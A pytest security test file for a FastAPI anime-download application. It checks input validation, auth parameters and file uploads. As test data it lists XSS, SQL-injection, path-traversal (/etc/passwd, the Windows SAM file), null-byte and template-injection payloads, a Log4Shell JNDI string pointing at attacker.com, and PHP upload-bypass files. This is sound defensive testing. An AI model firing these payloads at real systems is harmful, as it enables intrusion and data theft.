- Created SetupRedirectMiddleware to redirect unconfigured apps to /setup - Enhanced /api/auth/setup endpoint to save anime_directory to config - Updated SetupRequest model to accept optional anime_directory parameter - Modified setup.html to send anime_directory in setup API call - Added @pytest.mark.requires_clean_auth marker for tests needing unconfigured state - Modified conftest.py to conditionally setup auth based on test marker - Fixed all test failures (846/846 tests now passing) - Updated instructions.md to mark setup tasks as complete This implementation ensures users are guided through initial setup before accessing the application, while maintaining test isolation and preventing auth state leakage between tests.
396 lines
13 KiB
Python
396 lines
13 KiB
Python
"""
|
|
Input Validation Security Tests.
|
|
|
|
This module tests input validation across the application to ensure
|
|
all user inputs are properly sanitized and validated.
|
|
"""
|
|
|
|
import pytest
|
|
from httpx import AsyncClient
|
|
|
|
from src.server.fastapi_app import app
|
|
|
|
|
|
@pytest.mark.security
|
|
class TestInputValidation:
|
|
"""Security tests for input validation."""
|
|
|
|
@pytest.fixture
|
|
async def client(self):
|
|
"""Create async HTTP client for testing."""
|
|
from httpx import ASGITransport
|
|
|
|
async with AsyncClient(
|
|
transport=ASGITransport(app=app), base_url="http://test"
|
|
) as ac:
|
|
yield ac
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_xss_in_anime_title(self, client):
|
|
"""Test XSS protection in anime title input."""
|
|
xss_payloads = [
|
|
"<script>alert('XSS')</script>",
|
|
"<img src=x onerror=alert('XSS')>",
|
|
"javascript:alert('XSS')",
|
|
"<svg onload=alert('XSS')>",
|
|
]
|
|
|
|
for payload in xss_payloads:
|
|
response = await client.post(
|
|
"/api/anime",
|
|
json={"title": payload, "description": "Test"},
|
|
)
|
|
|
|
# Should either reject or sanitize
|
|
if response.status_code == 200:
|
|
# If accepted, should be sanitized
|
|
data = response.json()
|
|
title = data.get("data", {}).get("title", "")
|
|
assert "<script>" not in title.lower()
|
|
assert "onerror" not in title.lower()
|
|
assert "javascript:" not in title.lower()
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_oversized_input(self, client):
|
|
"""Test handling of extremely large inputs."""
|
|
# Try very long string
|
|
huge_string = "A" * 1000000 # 1MB of data
|
|
|
|
response = await client.post(
|
|
"/api/anime",
|
|
json={"title": huge_string, "description": "Test"},
|
|
)
|
|
|
|
# Should reject or truncate
|
|
assert response.status_code in [400, 413, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_null_byte_injection(self, client):
|
|
"""Test null byte injection protection."""
|
|
null_byte_payloads = [
|
|
"filename.txt\x00.exe",
|
|
"test\x00admin",
|
|
"user\x00' OR '1'='1",
|
|
]
|
|
|
|
for payload in null_byte_payloads:
|
|
response = await client.post(
|
|
"/api/anime/search",
|
|
params={"query": payload},
|
|
)
|
|
|
|
# Should handle safely
|
|
assert response.status_code in [200, 400, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_unicode_bypass_attempts(self, client):
|
|
"""Test handling of unicode bypass attempts."""
|
|
unicode_payloads = [
|
|
"admin\u202e", # Right-to-left override
|
|
"\ufeffadmin", # Zero-width no-break space
|
|
"ad\u200bmin", # Zero-width space
|
|
]
|
|
|
|
for payload in unicode_payloads:
|
|
response = await client.post(
|
|
"/api/auth/login",
|
|
json={"username": payload, "password": "test"},
|
|
)
|
|
|
|
# Should not bypass security
|
|
assert response.status_code in [401, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_path_traversal_in_file_access(self, client):
|
|
"""Test path traversal protection."""
|
|
traversal_payloads = [
|
|
"../../../etc/passwd",
|
|
"..\\..\\..\\windows\\system32\\config\\sam",
|
|
"....//....//....//etc/passwd",
|
|
"..%2F..%2F..%2Fetc%2Fpasswd",
|
|
]
|
|
|
|
for payload in traversal_payloads:
|
|
response = await client.get(f"/static/{payload}")
|
|
|
|
# Should not access sensitive files
|
|
# App returns error page (200) or proper error code
|
|
if response.status_code == 200:
|
|
# Verify it's an error page, not the actual file
|
|
content = response.text.lower()
|
|
assert (
|
|
"error" in content or
|
|
"not found" in content or
|
|
"<!doctype html>" in content
|
|
), "Response should be error page, not sensitive file"
|
|
else:
|
|
assert response.status_code in [400, 403, 404]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_negative_numbers_where_positive_expected(
|
|
self, client
|
|
):
|
|
"""Test handling of negative numbers in inappropriate contexts."""
|
|
response = await client.post(
|
|
"/api/downloads",
|
|
json={
|
|
"anime_id": -1,
|
|
"episode_number": -5,
|
|
"priority": -10,
|
|
},
|
|
)
|
|
|
|
# Should reject negative values
|
|
assert response.status_code in [400, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_special_characters_in_username(self, client):
|
|
"""Test handling of special characters in usernames."""
|
|
special_chars = [
|
|
"user<script>",
|
|
"user@#$%^&*()",
|
|
"user\n\r\t",
|
|
"user'OR'1'='1",
|
|
]
|
|
|
|
for username in special_chars:
|
|
response = await client.post(
|
|
"/api/auth/register",
|
|
json={
|
|
"username": username,
|
|
"password": "SecureP@ss123!",
|
|
"email": "test@example.com",
|
|
},
|
|
)
|
|
|
|
# Should either reject or sanitize
|
|
if response.status_code == 200:
|
|
data = response.json()
|
|
registered_username = data.get("data", {}).get(
|
|
"username", ""
|
|
)
|
|
assert "<script>" not in registered_username
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_email_validation(self, client):
|
|
"""Test email format validation."""
|
|
invalid_emails = [
|
|
"notanemail",
|
|
"@example.com",
|
|
"user@",
|
|
"user space@example.com",
|
|
"user@example",
|
|
]
|
|
|
|
for email in invalid_emails:
|
|
response = await client.post(
|
|
"/api/auth/register",
|
|
json={
|
|
"username": f"user_{hash(email)}",
|
|
"password": "SecureP@ss123!",
|
|
"email": email,
|
|
},
|
|
)
|
|
|
|
# Should reject invalid emails
|
|
assert response.status_code in [400, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_array_injection(self, client):
|
|
"""Test handling of array inputs in unexpected places."""
|
|
response = await client.post(
|
|
"/api/anime",
|
|
json={
|
|
"title": ["array", "instead", "of", "string"],
|
|
"description": "Test",
|
|
},
|
|
)
|
|
|
|
# Should reject or handle gracefully
|
|
assert response.status_code in [400, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_object_injection(self, client):
|
|
"""Test handling of object inputs in unexpected places."""
|
|
response = await client.post(
|
|
"/api/anime/search",
|
|
params={"query": {"nested": "object"}},
|
|
)
|
|
|
|
# Should reject with proper error or handle gracefully
|
|
# API converts objects to strings and searches for them (returns [])
|
|
if response.status_code == 200:
|
|
# Verify it handled it safely (returned empty or error)
|
|
data = response.json()
|
|
assert isinstance(data, list)
|
|
# Should not have executed the object as code
|
|
assert "nested" not in str(data).lower() or len(data) == 0
|
|
else:
|
|
assert response.status_code in [400, 422]
|
|
|
|
|
|
@pytest.mark.security
|
|
@pytest.mark.requires_clean_auth
|
|
class TestAPIParameterValidation:
|
|
"""Security tests for API parameter validation."""
|
|
|
|
@pytest.fixture
|
|
async def client(self):
|
|
"""Create async HTTP client for testing."""
|
|
from httpx import ASGITransport
|
|
|
|
async with AsyncClient(
|
|
transport=ASGITransport(app=app), base_url="http://test"
|
|
) as ac:
|
|
yield ac
|
|
|
|
async def get_auth_token(self, client):
|
|
"""Helper to get authentication token."""
|
|
password = "SecurePass123!"
|
|
await client.post(
|
|
"/api/auth/setup",
|
|
json={"master_password": password}
|
|
)
|
|
login_response = await client.post(
|
|
"/api/auth/login",
|
|
json={"password": password}
|
|
)
|
|
return login_response.json()["access_token"]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_invalid_pagination_parameters(self, client):
|
|
"""Test handling of invalid pagination parameters."""
|
|
token = await self.get_auth_token(client)
|
|
headers = {"Authorization": f"Bearer {token}"}
|
|
|
|
invalid_params = [
|
|
{"page": -1, "per_page": 10},
|
|
{"page": 1, "per_page": -10},
|
|
{"page": 999999999, "per_page": 999999999},
|
|
{"page": "invalid", "per_page": "invalid"},
|
|
]
|
|
|
|
for params in invalid_params:
|
|
response = await client.get(
|
|
"/api/anime", params=params, headers=headers
|
|
)
|
|
|
|
# Should reject or use defaults, or 503 when service unavailable
|
|
assert response.status_code in [200, 400, 422, 503]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_injection_in_query_parameters(self, client):
|
|
"""Test injection protection in query parameters."""
|
|
injection_queries = [
|
|
"' OR '1'='1",
|
|
"<script>alert('XSS')</script>",
|
|
"${jndi:ldap://attacker.com/evil}",
|
|
"{{7*7}}",
|
|
]
|
|
|
|
for query in injection_queries:
|
|
response = await client.get(
|
|
"/api/anime/search", params={"query": query}
|
|
)
|
|
|
|
# Should handle safely
|
|
assert response.status_code in [200, 400, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_missing_required_parameters(self, client):
|
|
"""Test handling of missing required parameters."""
|
|
response = await client.post("/api/auth/login", json={})
|
|
|
|
# Should reject with appropriate error
|
|
assert response.status_code == 422
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_extra_unexpected_parameters(self, client):
|
|
"""Test handling of extra unexpected parameters."""
|
|
response = await client.post(
|
|
"/api/auth/login",
|
|
json={
|
|
"username": "testuser",
|
|
"password": "test",
|
|
"unexpected_field": "malicious_value",
|
|
"is_admin": True, # Attempt to elevate privileges
|
|
},
|
|
)
|
|
|
|
# Should ignore extra params or reject
|
|
if response.status_code == 200:
|
|
# Should not grant admin from parameter
|
|
data = response.json()
|
|
assert not data.get("data", {}).get("is_admin", False)
|
|
|
|
|
|
@pytest.mark.security
|
|
class TestFileUploadSecurity:
|
|
"""Security tests for file upload handling."""
|
|
|
|
@pytest.fixture
|
|
async def client(self):
|
|
"""Create async HTTP client for testing."""
|
|
from httpx import ASGITransport
|
|
|
|
async with AsyncClient(
|
|
transport=ASGITransport(app=app), base_url="http://test"
|
|
) as ac:
|
|
yield ac
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_malicious_file_extension(self, client):
|
|
"""Test handling of dangerous file extensions."""
|
|
dangerous_extensions = [
|
|
".exe",
|
|
".sh",
|
|
".bat",
|
|
".cmd",
|
|
".php",
|
|
".jsp",
|
|
]
|
|
|
|
for ext in dangerous_extensions:
|
|
files = {"file": (f"test{ext}", b"malicious content")}
|
|
response = await client.post("/api/upload", files=files)
|
|
|
|
# Should reject dangerous files
|
|
assert response.status_code in [400, 403, 415]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_file_size_limit(self, client):
|
|
"""Test enforcement of file size limits."""
|
|
# Try to upload very large file
|
|
large_content = b"A" * (100 * 1024 * 1024) # 100MB
|
|
|
|
files = {"file": ("large.txt", large_content)}
|
|
response = await client.post("/api/upload", files=files)
|
|
|
|
# Should reject oversized files
|
|
assert response.status_code in [413, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_double_extension_bypass(self, client):
|
|
"""Test protection against double extension bypass."""
|
|
files = {"file": ("image.jpg.php", b"<?php phpinfo(); ?>")}
|
|
response = await client.post("/api/upload", files=files)
|
|
|
|
# Should detect and reject
|
|
assert response.status_code in [400, 403, 415]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_mime_type_validation(self, client):
|
|
"""Test MIME type validation."""
|
|
# PHP file with image MIME type
|
|
files = {
|
|
"file": (
|
|
"image.jpg",
|
|
b"<?php phpinfo(); ?>",
|
|
"image/jpeg",
|
|
)
|
|
}
|
|
response = await client.post("/api/upload", files=files)
|
|
|
|
# Should validate actual content, not just MIME type
|
|
assert response.status_code in [400, 403, 415]
|